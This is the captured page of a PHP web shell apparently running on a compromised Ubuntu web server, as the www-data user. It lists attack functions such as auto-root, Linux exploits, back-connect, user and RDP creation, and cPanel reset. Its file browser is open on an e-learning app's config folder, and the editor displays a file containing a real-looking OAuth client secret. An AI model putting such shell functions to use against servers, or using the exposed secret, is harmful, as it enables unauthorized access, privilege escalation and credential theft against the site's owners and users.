Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.api.tsx
500
B
-rw-r--r--
app.dev.tsx
64
B
-rw-r--r--
app.github.tsx
1.01
KB
-rw-r--r--
app.mock.tsx
353
B
-rw-r--r--
app.oauth-code.tsx
1.41
KB
-rw-r--r--
app.oauth-password.tsx
837
B
-rw-r--r--
app.prod.tsx
64
B
-rw-r--r--
common.tsx
312
B
-rw-r--r--
index.tsx
2.96
KB
-rw-r--r--
routes.tsx
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.oauth-password.tsx
import { Config, AuthType } from '.'; const url = window.__APP_API__ + '/v1/admin/login'; const config: Config = { authType: AuthType.OAuthPassword, authConfig: { clientId: '3', clientSecret: 'ZXfEY5hGKQzrUiirj79YQK5HaRIzhZwgBgfjLTkz', authorizationUri: url, userProfileUri: window.__APP_API__ + '/v1/admin/get-account', logoutUri: 'http://localhost:9110/oauth/logout', // authorizationUri: "https://cloud.bndy.net/service-sso/oauth/token", // userProfileUri: "https://cloud.bndy.net/service-sso/oauth/me", // logoutUri: "https://cloud.bndy.net/service-sso/oauth/logout", }, userConverter: (backendUser: any) => { return { name: backendUser.username, email: backendUser.email, }; }, }; module.exports = config;
Close